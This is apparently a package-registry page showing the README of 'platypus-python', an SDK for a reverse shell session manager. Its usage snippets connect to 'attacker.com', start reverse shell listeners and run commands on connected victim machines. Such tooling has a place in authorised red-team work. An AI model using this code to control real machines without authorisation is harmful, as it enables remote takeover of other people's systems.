You're Invited:Meet the Socket Team at BlackHat and DEF CON in Las Vegas, Aug 7-8.RSVP
Socket
Socket
Sign inDemoInstall

platypus-python

Package Overview
Dependencies
Maintainers
1
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

platypus-python

Python SDK for reverse shell sessions manager - Platypus v1.4.1


Maintainers
1

Readme

Platypus-Python

Python SDK for reverse shell sessions manager Platypus v1.3.1

Install

pip install platypus-python

Usage

Connect to Platypus endpoint

import platypus_python as pp

p = pp.Platypus("attacker.com", 7331)

Create a reverse shell server

server = p.create_server("0.0.0.0", 13339)

Stop a reverse shell server

server = servers[0]
server.delete()

Get all available listening servers

servers = p.get_servers()
for server in servers():
    print(server)

Get all online Clients of a server

server = servers[0]
clients = server.get_clients()
for client in clients:
    print(client)

Execute a command on a client

client = clients[0]
client.system("id")

Keywords

FAQs


Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc